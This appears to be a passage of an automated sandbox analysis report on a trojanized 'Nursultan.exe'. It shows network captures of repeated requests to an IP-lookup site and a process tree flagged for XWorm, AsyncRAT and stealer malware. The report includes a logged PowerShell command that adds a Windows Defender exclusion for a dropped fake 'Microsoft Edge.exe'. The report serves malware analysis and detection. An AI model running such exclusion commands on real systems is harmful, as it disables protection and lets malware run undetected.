2024-09-06 23:48:58 UTC | 1091 | IN | Data Raw: 20 20 20 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 30 30 37 30 36 37 22 20 64 3d 22 4d 31 31 2e 39 39 39 38 38 33 36 2c 34 2e 30 39 33 37 30 38 30 33 20 4c 38 2e 35 35 38 30 39 35 31 37 2c 37 2e 34 33 32 39 34 39 35 33 20 43 38 2e 32 33 35 33 31 34 35 39 2c 37 2e 37 34 36 31 31 32 39 38 20 38 2e 32 33 35 33 31 34 35 39 2c 38 2e 32 35 33 38 38 37 33 36 20 38 2e 35 35 38 30 39 35 31 37 2c 38 2e 35 36 36 39 33 37 36 39 20 4c 31 32 2c 31 31 2e 39 30 36 32 39 32 31 20 4c 39 2e 38 34 31 38 37 38 37 31 2c 31 34 20 4c 34 2e 32 34 32 30 38 35 34 34 2c 38 2e 35 36 36 39 33 37 35 31 20 43 33 2e 39 31 39 33 30 34 38 35 2c 38 2e 32 35 33 38 38 37 31 39 20 33 2e 39 31 39 33 30 34 38 35 2c 37 2e 37 34 36 31 31 32 38 31 20 34 2e 32 34 32 30 38 35 34 34 2c 37 2e
Data Ascii: <path fill="#007067" d="M11.9998836,4.09370803 L8.55809517,7.43294953 C8.23531459,7.74611298 8.23531459,8.25388736 8.55809517,8.56693769 L12,11.9062921 L9.84187871,14 L4.24208544,8.56693751 C3.91930485,8.25388719 3.91930485,7.74611281 4.24208544,7.
2024-09-06 23:48:58 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 58 | Source IP: 192.168.2.5 | Source Port: 49821 | Destination IP: 104.21.85.189 | Destination Port: 443
Timestamp | Bytes transferred | Direction | Data
2024-09-06 23:49:01 UTC | 64 | OUT | GET /xml/ HTTP/1.1
Host: ipbase.com
Connection: Keep-Alive
2024-09-06 23:49:01 UTC | 745 | IN | HTTP/1.1 404 Not Found
Date: Fri, 06 Sep 2024 23:49:01 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Age: 24628
Cache-Control: public,max-age=0,must-revalidate
Cache-Status: "Netlify Edge"; hit
Vary: Accept-Encoding
X-Nf-Request-Id: 01J74VVFWKKNXEPRGEXVXN4475
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ChIRO7xaxtwSGCN%2BqMPvUv%2BsvGXGpUxkh3fu5IuflzcJdRXZgxIb%2BTbz3s3PpLPwOSyO3tqt8chNLEk35le%2B%2FJuUHaJGhsSx8%2Bdo6hn%2F0GnzHfDEFzvS0mxwH%2Fvo"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8bf25a6bfbd9c325-EWR
alt-svc: h3=":443"; ma=86400
2024-09-06 23:49:01 UTC | 624 | IN | Data Raw: 63 30 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d
Data Ascii: c0a<!DOCTYPE html><html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <title>Page Not Found</title> <link href='https://fonts.googleapis.com
2024-09-06 23:49:01 UTC | 1369 | IN | Data Raw: 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 32 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 6d 61 69 6e 20 7b 0a 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20
Data Ascii: padding: 0; } h1 { margin: 0; font-size: 22px; line-height: 24px; } .main { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center;
2024-09-06 23:49:01 UTC | 1096 | IN | Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 30 30 37 30 36 37 22 20 64 3d 22 4d 31 31 2e 39 39 39 38 38 33 36 2c 34 2e 30 39 33 37 30 38 30 33 20 4c 38 2e 35 35 38 30 39 35 31 37 2c 37 2e 34 33 32 39 34 39 35 33 20 43 38 2e 32 33 35 33 31 34 35 39 2c 37 2e 37 34 36 31 31 32 39 38 20 38 2e 32 33 35 33 31 34 35 39 2c 38 2e 32 35 33 38 38 37 33 36 20 38 2e 35 35 38 30 39 35 31 37 2c 38 2e 35 36 36 39 33 37 36 39 20 4c 31 32 2c 31 31 2e 39 30 36 32 39 32 31 20 4c 39 2e 38 34 31 38 37 38 37 31 2c 31 34 20 4c 34 2e 32 34 32 30 38 35 34 34 2c 38 2e 35 36 36 39 33 37 35 31 20 43 33 2e 39 31 39 33 30 34 38 35 2c 38 2e 32 35 33 38 38 37 31 39 20 33 2e 39 31 39 33 30 34 38 35 2c 37 2e 37 34 36 31 31 32 38 31 20 34 2e 32 34 32 30 38 35
Data Ascii: <path fill="#007067" d="M11.9998836,4.09370803 L8.55809517,7.43294953 C8.23531459,7.74611298 8.23531459,8.25388736 8.55809517,8.56693769 L12,11.9062921 L9.84187871,14 L4.24208544,8.56693751 C3.91930485,8.25388719 3.91930485,7.74611281 4.242085
2024-09-06 23:49:01 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 59 | Source IP: 192.168.2.5 | Source Port: 49824 | Destination IP: 104.21.85.189 | Destination Port: 443
Timestamp | Bytes transferred | Direction | Data
2024-09-06 23:49:03 UTC | 64 | OUT | GET /xml/ HTTP/1.1
Host: ipbase.com
Connection: Keep-Alive
2024-09-06 23:49:03 UTC | 739 | IN | HTTP/1.1 404 Not Found
Date: Fri, 06 Sep 2024 23:49:03 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Age: 30349
Cache-Control: public,max-age=0,must-revalidate
Cache-Status: "Netlify Edge"; hit
Vary: Accept-Encoding
X-Nf-Request-Id: 01J74VVHYZQ9PBP7HAC3YZ3B0K
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A1kwaaSxU2BmqLERBew%2BkRroJClGGvA%2BE8%2BI4yK0wx4fJuncYL6tcZBJi2D%2FoelkCyTxTXCbH5gounPVLgc3BlSP9mLTa3qYlACwZsQ6KMkqS%2B0f27HBr6ab8WJB"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8bf25a793805186d-EWR
alt-svc: h3=":443"; ma=86400
2024-09-06 23:49:03 UTC | 630 | IN | Data Raw: 63 30 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d
Data Ascii: c0a<!DOCTYPE html><html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <title>Page Not Found</title> <link href='https://fonts.googleapis.com
2024-09-06 23:49:03 UTC | 1369 | IN | Data Raw: 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 32 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 6d 61 69 6e 20 7b 0a 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 68 65 69 67 68
Data Ascii: ding: 0; } h1 { margin: 0; font-size: 22px; line-height: 24px; } .main { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; heigh
2024-09-06 23:49:03 UTC | 1090 | IN | Data Raw: 20 20 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 30 30 37 30 36 37 22 20 64 3d 22 4d 31 31 2e 39 39 39 38 38 33 36 2c 34 2e 30 39 33 37 30 38 30 33 20 4c 38 2e 35 35 38 30 39 35 31 37 2c 37 2e 34 33 32 39 34 39 35 33 20 43 38 2e 32 33 35 33 31 34 35 39 2c 37 2e 37 34 36 31 31 32 39 38 20 38 2e 32 33 35 33 31 34 35 39 2c 38 2e 32 35 33 38 38 37 33 36 20 38 2e 35 35 38 30 39 35 31 37 2c 38 2e 35 36 36 39 33 37 36 39 20 4c 31 32 2c 31 31 2e 39 30 36 32 39 32 31 20 4c 39 2e 38 34 31 38 37 38 37 31 2c 31 34 20 4c 34 2e 32 34 32 30 38 35 34 34 2c 38 2e 35 36 36 39 33 37 35 31 20 43 33 2e 39 31 39 33 30 34 38 35 2c 38 2e 32 35 33 38 38 37 31 39 20 33 2e 39 31 39 33 30 34 38 35 2c 37 2e 37 34 36 31 31 32 38 31 20 34 2e 32 34 32 30 38 35 34 34 2c 37 2e 34
Data Ascii: <path fill="#007067" d="M11.9998836,4.09370803 L8.55809517,7.43294953 C8.23531459,7.74611298 8.23531459,8.25388736 8.55809517,8.56693769 L12,11.9062921 L9.84187871,14 L4.24208544,8.56693751 C3.91930485,8.25388719 3.91930485,7.74611281 4.24208544,7.4
2024-09-06 23:49:03 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 60 | Source IP: 192.168.2.5 | Source Port: 49826 | Destination IP: 104.21.85.189 | Destination Port: 443
Timestamp | Bytes transferred | Direction | Data
2024-09-06 23:49:08 UTC | 64 | OUT | GET /xml/ HTTP/1.1
Host: ipbase.com
Connection: Keep-Alive
2024-09-06 23:49:08 UTC | 735 | IN | HTTP/1.1 404 Not Found
Date: Fri, 06 Sep 2024 23:49:08 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Age: 33403
Cache-Control: public,max-age=0,must-revalidate
Cache-Status: "Netlify Edge"; hit
Vary: Accept-Encoding
X-Nf-Request-Id: 01J74VVPTE6J1V2K7M0WMRAR35
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tkfgao4CTxxgQqeCA2MfDHtEyGAMcSgNvxdy4Se3LIQJN%2FLpEwNgEotNPodeYxTrYhpdv5piKkAEpcNeQiwx0rPtCZljuzNIeTDXHz7XI3S9hI%2FoTR06%2BoKx91CX"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8bf25a984c2b4282-EWR
alt-svc: h3=":443"; ma=86400
2024-09-06 23:49:08 UTC | 634 | IN | Data Raw: 63 30 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d
Data Ascii: c0a<!DOCTYPE html><html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <title>Page Not Found</title> <link href='https://fonts.googleapis.com
2024-09-06 23:49:08 UTC | 1369 | IN | Data Raw: 3a 20 30 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 32 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 6d 61 69 6e 20 7b 0a 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31
Data Ascii: : 0; } h1 { margin: 0; font-size: 22px; line-height: 24px; } .main { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; height: 1
2024-09-06 23:49:08 UTC | 1086 | IN | Data Raw: 20 20 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 30 30 37 30 36 37 22 20 64 3d 22 4d 31 31 2e 39 39 39 38 38 33 36 2c 34 2e 30 39 33 37 30 38 30 33 20 4c 38 2e 35 35 38 30 39 35 31 37 2c 37 2e 34 33 32 39 34 39 35 33 20 43 38 2e 32 33 35 33 31 34 35 39 2c 37 2e 37 34 36 31 31 32 39 38 20 38 2e 32 33 35 33 31 34 35 39 2c 38 2e 32 35 33 38 38 37 33 36 20 38 2e 35 35 38 30 39 35 31 37 2c 38 2e 35 36 36 39 33 37 36 39 20 4c 31 32 2c 31 31 2e 39 30 36 32 39 32 31 20 4c 39 2e 38 34 31 38 37 38 37 31 2c 31 34 20 4c 34 2e 32 34 32 30 38 35 34 34 2c 38 2e 35 36 36 39 33 37 35 31 20 43 33 2e 39 31 39 33 30 34 38 35 2c 38 2e 32 35 33 38 38 37 31 39 20 33 2e 39 31 39 33 30 34 38 35 2c 37 2e 37 34 36 31 31 32 38 31 20 34 2e 32 34 32 30 38 35 34 34 2c 37 2e 34 33 32 39 34
Data Ascii: <path fill="#007067" d="M11.9998836,4.09370803 L8.55809517,7.43294953 C8.23531459,7.74611298 8.23531459,8.25388736 8.55809517,8.56693769 L12,11.9062921 L9.84187871,14 L4.24208544,8.56693751 C3.91930485,8.25388719 3.91930485,7.74611281 4.24208544,7.43294
2024-09-06 23:49:08 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      61192.168.2.549831104.21.85.189443
                                      TimestampBytes transferredDirectionData
                                      2024-09-06 23:49:13 UTC64OUTGET /xml/ HTTP/1.1
                                      Host: ipbase.com
                                      Connection: Keep-Alive
                                      2024-09-06 23:49:13 UTC737INHTTP/1.1 404 Not Found
                                      Date: Fri, 06 Sep 2024 23:49:13 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Age: 11977
                                      Cache-Control: public,max-age=0,must-revalidate
                                      Cache-Status: "Netlify Edge"; hit
                                      Vary: Accept-Encoding
                                      X-Nf-Request-Id: 01J74VVV9X64BVZWK4Q6QMS891
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q1o8K11UUPRYUzuGIgCZvqEsAePQfndC%2BdftMZSas4M87euai7PCc8fYhAK%2Fzv4BIFszf6Z7kcQ4MGxcwfbLt12hCQkAZ%2FYgTow14zAHS46f3wiQA0zHC1Ay0%2Bis"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf25ab50fb07d06-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:49:13 UTC | 632 | IN | Data Ascii: c0a<!DOCTYPE html><html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <title>Page Not Found</title> <link href='https://fonts.googleapis.com
                                      2024-09-06 23:49:13 UTC | 1369 | IN | Data Ascii: ng: 0; } h1 { margin: 0; font-size: 22px; line-height: 24px; } .main { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; height:
                                      2024-09-06 23:49:13 UTC | 1088 | IN | Data Ascii: <path fill="#007067" d="M11.9998836,4.09370803 L8.55809517,7.43294953 C8.23531459,7.74611298 8.23531459,8.25388736 8.55809517,8.56693769 L12,11.9062921 L9.84187871,14 L4.24208544,8.56693751 C3.91930485,8.25388719 3.91930485,7.74611281 4.24208544,7.432
                                      2024-09-06 23:49:13 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a (Data Ascii: 0, the terminating chunk)


                                      Session ID: 62
                                      Source IP: 192.168.2.5
                                      Source Port: 49834
                                      Destination IP: 104.21.85.189
                                      Destination Port: 443
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-09-06 23:49:15 UTC | 64 | OUT | GET /xml/ HTTP/1.1
                                      Host: ipbase.com
                                      Connection: Keep-Alive
                                      2024-09-06 23:49:15 UTC | 740 | IN | HTTP/1.1 404 Not Found
                                      Date: Fri, 06 Sep 2024 23:49:15 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Age: 7759
                                      Cache-Control: public,max-age=0,must-revalidate
                                      Cache-Status: "Netlify Edge"; hit
                                      Vary: Accept-Encoding
                                      X-Nf-Request-Id: 01J74VVXGP7ME07HB8CT07821J
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TN7a3LITMkUnS64ko%2FUpC9UBkp5gNq7HMI%2BthqHRufsJ2qNDYaToFEAm9ZVnE%2FLaggHyMCtsN6%2FZ0%2B460leRosyRDpJ%2FpJWpuktEvTL0KqnyT4KrSiJ0FdyB35U7"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf25ac34a8442a1-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:49:15 UTC | 629 | IN | Data Ascii: c0a<!DOCTYPE html><html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <title>Page Not Found</title> <link href='https://fonts.googleapis.com
                                      2024-09-06 23:49:15 UTC | 1369 | IN | Data Ascii: dding: 0; } h1 { margin: 0; font-size: 22px; line-height: 24px; } .main { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; heig
                                      2024-09-06 23:49:15 UTC | 1091 | IN | Data Ascii: <path fill="#007067" d="M11.9998836,4.09370803 L8.55809517,7.43294953 C8.23531459,7.74611298 8.23531459,8.25388736 8.55809517,8.56693769 L12,11.9062921 L9.84187871,14 L4.24208544,8.56693751 C3.91930485,8.25388719 3.91930485,7.74611281 4.24208544,7.
                                      2024-09-06 23:49:15 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a (Data Ascii: 0, the terminating chunk)


                                      Target ID:0
                                      Start time:19:46:54
                                      Start date:06/09/2024
                                      Path:C:\Users\user\Desktop\Nursultan.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\Desktop\Nursultan.exe"
                                      Imagebase:0x4b0000
                                      File size:920'064 bytes
                                      MD5 hash:CCFA4401DF6DCAEF4265F5EDD06F3FDE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2042796854.0000000012898000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2042796854.0000000012898000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                      Reputation:low
                                      Has exited:true

                                      Target ID:2
                                      Start time:19:46:56
                                      Start date:06/09/2024
                                      Path:C:\Users\user\AppData\Local\Temp\Nursultan.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Local\Temp\Nursultan.exe"
                                      Imagebase:0x720000
                                      File size:805'888 bytes
                                      MD5 hash:A99954BFF017983BF455DE31C5F0696A
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 92%, ReversingLabs
                                      Reputation:low
                                      Has exited:true

                                      Target ID:3
                                      Start time:19:46:57
                                      Start date:06/09/2024
                                      Path:C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe"
                                      Imagebase:0xb80000
                                      File size:212'480 bytes
                                      MD5 hash:C2A5CD7C5F8A633BAFB54B62CEE38077
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000000.2041682947.0000000000B82000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000003.00000000.2041682947.0000000000B82000.00000002.00000001.01000000.00000007.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000002.3293638320.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000002.3336137166.0000000012EF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000003.00000002.3336137166.0000000012EF1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe, Author: Joe Security
                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe, Author: Joe Security
                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe, Author: ditekSHen
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 84%, ReversingLabs
                                      Reputation:low
                                      Has exited:false

                                      Target ID:4
                                      Start time:19:46:59
                                      Start date:06/09/2024
                                      Path:C:\Users\user\AppData\Local\Temp\Nursultan2.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Local\Temp\Nursultan2.exe"
                                      Imagebase:0xc10000
                                      File size:606'720 bytes
                                      MD5 hash:0BA8218F991E81620F31083273EE7D91
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000004.00000002.2106362041.0000000012F48000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: 00000004.00000002.2106362041.0000000012F48000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: 00000004.00000002.2105694869.0000000002F41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 88%, ReversingLabs
                                      Reputation:low
                                      Has exited:true

                                      Target ID:5
                                      Start time:19:46:59
                                      Start date:06/09/2024
                                      Path:C:\Users\user\AppData\Local\Temp\Nursultan.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Local\Temp\Nursultan.exe"
                                      Imagebase:0xcf0000
                                      File size:805'888 bytes
                                      MD5 hash:A99954BFF017983BF455DE31C5F0696A
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      Target ID:6
                                      Start time:19:47:01
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe'
                                      Imagebase:0x7ff7be880000
                                      File size:452'608 bytes
                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:7
                                      Start time:19:47:01
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
